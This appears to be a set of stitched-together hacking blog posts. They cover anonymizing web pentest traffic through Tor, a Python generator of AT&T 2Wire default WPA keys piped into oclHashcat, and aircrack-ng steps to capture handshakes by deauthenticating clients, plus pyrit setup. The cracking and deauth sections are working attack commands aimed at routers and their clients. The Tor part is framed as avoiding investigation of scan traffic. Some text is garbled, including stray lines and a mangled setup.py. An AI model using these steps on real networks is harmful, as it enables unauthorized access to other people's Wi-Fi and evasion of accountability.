INIT_6

Disclaimer: The following information is for educational uses only. Only preform testing on your own equipment or that which you have permission to. If you don't understand what TOR is. How TOR network works. The risk of information going through TOR networks. You should really not follow these steps as most likely you will fuck something up and get your self in trouble. bitches.
/Disclaimer.

When Pen-testing a web application you may need to stay anonymous. This could be for many reasons. Mainly making sure your scans and testing doesn't trigger an investigation into the origin of the traffic.

One of the main tools I use along with almost everyone else is Burp Suite. They have a free version but if you are using this for commercial reasons make sure you buy a copy as it has some features that are really useful (i.e. Automated XSS/SQL injection testing.).

Other tools of the trade, Nikto, OWASP DirBuster, NMAP, etc.

Now its time to setup an environment in which we can use all these applications and more through TOR.

Install your favorite Virtual machine software. I will be using Virtual Box  in this blog post as its free. However, I have VMware workstation that I mostly use.

Install your favorite Linux distro. I suggest using xubuntu or ubuntu server.  I will reference this install as VMtor for the rest of this post.

Once you have your linux box running in virtual box do all your updates/patches. Make sure everything is running smoothly. Install a few needed apps. "curl, screen, htop, openssh-server, privoxy, default-jre (or your favorite opensource java)"

$ sudo apt-get update
$ sudo apt-get install curl screen htop openssh-server privoxy default-jre

Now on your host machine (has to be Linux). Open a terminal and ssh into your VMtor with forwarding X windows. (This will let you open VMtor apps inside your host desktop.)

$ssh -X <user>@ip_address_of_VMtor

We are going to be using someone elses script to install TOR, and configure iptables to forward all traffic on the machine through TOR. Download it here: https://github.com/ericpaulbishop/iptables_torify

Direct link: https://github.com/ericpaulbishop/iptables_torify/archive/master.zip

Unzip it, run the script as root.
$ sudo ./debian_install.sh

Once its finished. open fire fox and go to https://check.torproject.org
Make sure you are on the TOR network.

Now we need to configure the local web proxy privoxy that you installed above.
edit /etc/privoxy/config

uncomment the following line:
forward-socks5  /     127.0.0.1:9050   .

Or just add it to the end of the file.

Now start the privoxy service.
$ sudo /etc/init.d/privoxy start

Privoxy runs on 127.0.0.1:8118

I use screen so I have better control of whats running and keep applications running on SSH disconnects. Learn more about screen here.
$ screen -S burp
$ java -jar burpsuite_free1.5.jar
screen command CTL+A+D to detach from screen.

Go to the proxy tab and than options tab. Double check proxy listener is setup on 127.0.0.1:8080

Go to Options Tab along the top. Click on Add under Upstream Proxy Servers.
Leave Destination host empty
Proxy host: 127.0.0.1
Proxy port: 8118
Authentication type: None
Click okay.



Now lets open a web browser on VMtor and configure it.

$ screen -S firefox
$firefox
screen command CTL+A+D to detach from screen.

Go to edit -> preferences.
Advanced -> Network tab -> Click on Settings...
Select Manual proxy configurations:

HTTP Proxy: 127.0.0.1 Port: 8118
SSL Proxy: 127.0.0.1 Port: 8118
FTP Proxy:  leave empty
SOCKS Host:  127.0.0.1 Port: 9050


Browse to a site. It should be captured in burp now.

That is it.

Now any time you use a application from within VMtor it will be routed through the TOR network.

Other Tips & Notes:

Use proxychains for nmap or zmap traffic:
http://www.commondork.com/2009/06/26/tunneling-nmap-through-tor/

Don't use the same browser on the host as you do in VMtor. For example in my host I only use google-chrome and in VMtor I only use firefox. This is to insure I don't make a mistake and use the wrong browser.

Take a snapshot of your VM after you set it up.

Why not just use tails either directly or in a VM? Yes it does to torify everything using IP Tables like above. Also, it is way more secure then the setup I have suggested above. It is also a lot easier to setup and use. However, the web proxy installed in tails wont work with burp. I had tried many of nights and hours trying to get it to work. Also, because its so customized installing third party apps like privoxy to make it work could cause damaged unknown.

Use duckduckgo.com as your search engine. Google tends to block TOR connections due to abuse.

Finally, Don't be stupid.

Only work if your phone is rooted.

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479

#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )

Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999 skipping any number that has three repeating numbers in a row.  so you wont have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers to random cutting their key space down. Its faster to count through and skip past repeating numbers then to process each number.

To change what the programs start on open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With a AMD driver 12.8 and SDK 2.7 I get about 86K keys  per second. With the built in brute-force I get 114K keys per second. Still working on how to improve my out put speed. 

To get more info on hashcat look here.

straight brute force on known key starting with 7 saved over an hour.

Screen shots.. With script                without script 


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP.  Airodump should show in the top right hand corner once you get a handshake.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

• -0 means deauthentication
• 5 is the number of deauths to send
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• mon0 is the interface name

If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

To strip out all the crap out of your pcap file expect for your handshakes run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.

Getting Pyrit to work with OpenCL and posgreSQL database. On Kubuntu 12.04 With a AMD Radon HD 7950 card.


You have to install AMD catalysis drivers and the AMD SDK. Make sure you install whatever one is older first then the newer one so you don't corrupt your install. This will change as they update the catalysis drivers and the SDK at different times. 


Go AMD and download and install the drivers for your card. here  
This page will help you install your drivers. here


Restart after install.


Download the latest SDK. here
This page will help you install your SDK. here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT =/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly and the protocol is running by:
This has to be ran as a normal user. Application doesn't work as root.
name@box$: fglrxinfo




Some decencies that I ran into. This list my not be complete. 

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


install easy_install fuction. Follow the steps here
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file to match the below:




LIBRARIES.append('OpenCL') 
try: if os.path.exists(os.environ['AMDAPPSDKROOT']): OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include')) 
    for path in ('lib/x86_64','lib/x86'): 
         if       os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):  OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path)) break except: pass for path in ('/opt/AMDAPP/include', \ '/opt/AMDAPP/include/CL'):


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




install postgresql 9 from website
install pgadmin3 from ubuntu software center.


Setup new user and database. 
User:2wire 
password: putitinme  
Database: 2wireDB


To have pyrit connect to your database do the following
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now if you don't want to type out all that non-sense each time edit the following file:


name@box$ nano ~./pyrit/config


Change where it says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB


Ctrl+o to save
Ctrl+x to exit


now you can simply run pyrit


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


Might have left out a few steps if you run across this page and need some help feel free to hit me up. I know pages just like this helped me install pyrit.

Link to my slides: